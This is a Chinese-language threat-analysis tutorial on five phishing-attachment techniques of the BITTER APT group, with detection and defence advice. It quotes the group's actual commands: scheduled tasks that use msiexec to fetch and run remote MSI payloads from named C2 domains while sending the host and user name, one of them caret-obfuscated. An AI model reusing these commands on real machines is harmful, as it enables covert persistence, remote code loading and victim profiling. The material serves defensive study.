APT组织“蔓灵花”恶意邮件附件5种手法分析
字数 1457
更新时间 2025-08-23 02:00:56

APT组织"蔓灵花"恶意邮件附件手法分析教学文档

一、组织背景

蔓灵花组织(BITTER、APT-C-08、苦象、T-APT-17):

  • 据称有南亚背景的APT组织
  • 活跃时间:自2013年11月起
  • 主要目标国家:巴基斯坦和中国
  • 攻击目标:政府部门、电力行业、军工业相关单位
  • 主要意图:窃取敏感资料

二、攻击手法概述

蔓灵花组织主要通过钓鱼邮件传播恶意附件,最终目的多为:

  1. 创建计划任务(定时15-25分钟执行一次)
  2. 使用msiexec请求C2服务器远程加载恶意".msi"文件
  3. 请求时带上计算机名和用户名
  4. C2后台根据这些信息创建空白文件夹
  5. 攻击者筛选目标后放入".msi"文件
  6. 下次计划任务执行时完成恶意远程加载

三、五种恶意附件手法详解

手法1:恶意".chm"文件投放

特点

  • 2021年初开始常见
  • 使用受控的".gov"邮箱账号传播
  • 附件为包含".chm"恶意文件的压缩包

恶意代码功能

  • 创建计划任务
  • 每隔17分钟远程加载一次恶意资源
  • 上传主机名和用户名

请求示例

http://comnmsgwrapsvc.net/ver/verif.php/?h=%computername%*%username%
http://folkmusicstreams.com/TIME/mac.php?sit=%computername%*%username%

技术细节

  • 使用msiexec远程加载
  • msiexec特点:
    • 命令行工具,用于安装、修复、卸载Windows Installer软件包
    • 支持远程资源安装
    • 下载到临时目录安装,完成后删除
    • 流量中User-Agent固定为"Windows Installer"

检测方法

  • 流量分析检测msiexec远程http资源加载
  • 监控User-Agent为"Windows Installer"的请求

手法2:恶意"DDE"隐藏域代码执行

特点

  • 投递带有恶意DDE auto的".docx"文档
  • 文档打开时显示空白或迷惑性内容
  • 需要查看域代码才能发现恶意内容

查看方法

  1. 文件 → 选项 → 视图
  2. 勾选"显示文档内容" → "域代码"

恶意代码示例

  • 域代码显示为十进制数
  • 转换为ASCII文本后为计划任务命令:
cmd /c msiexec.exe /i http://nesiallservice.net/chq/stall.msi /q

关联组织

  • APT-Q-42腾云蛇组织也使用过类似手法

手法3:".ppt"文件PowerPoint单击鼠标事件

特点

  • 下发恶意".PPT"文件
  • 在图片上设置鼠标单击事件
  • 触发后创建计划任务远程加载恶意msi资源

示例代码

cmd.exe /c schtasks /create /sc minute /mo 15 /tn AudioDg /f /tr "%coMSPec% /c start /min msiexec /i http://farleysmxpph.com/FOXX/far.php?ptu=%computername%*%username% /qn /norestart"

手法4:文档宏病毒

特点

  • 下发携带恶意宏的文件
  • 相对少见(需要用户启用宏)
  • 可能设置密码保护

分析方法

  1. 启用宏后,进入开发工具 → VB编辑器
  2. 若存在密码,使用VBA_Password_Bypasser工具解密
  3. 分析解密后的恶意代码功能

手法5:CVE-2018-0798公式编辑器漏洞利用

特点

  • 下发携带漏洞的".xlsx"文件
  • CVE-2018-0798利用成功率较高

恶意行为

  • 进程释放后创建计划任务
  • 远程加载恶意代码

示例命令

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 15 /TN \Windows\DWM\DWMCORE /TR "cmd /c start /min ms^iex^ec /i htt^p^:^//alf^ieh^eal^thc^ares^erv^ice^.^com/AL/al.php/?dt=%computername% /q" /f

四、后续载荷演变

  • 2023年5月前:常见为"wmRAT"远控
  • 2023年5月首次曝光:使用"白加黑"ORPCBackdoor后门

五、防御建议

  1. 邮件安全

    • 警惕不明来源邮件,特别是".gov"邮箱发送的
    • 谨慎处理压缩包附件

  2. 文档处理

    • 禁用宏执行
    • 不轻易启用文档内容
    • 注意空白文档或异常文档

  3. 系统监控

    • 监控计划任务创建行为
    • 特别关注15-25分钟间隔的任务

  4. 网络流量

    • 检测msiexec远程加载行为
    • 监控User-Agent为"Windows Installer"的请求

  5. 漏洞防护

    • 及时修补公式编辑器等漏洞
    • 保持Office软件更新

  6. 取证分析

    • 注意msi文件不会在本地留存
    • 重点进行流量分析和内存取证
相似文章
相似文章
 全屏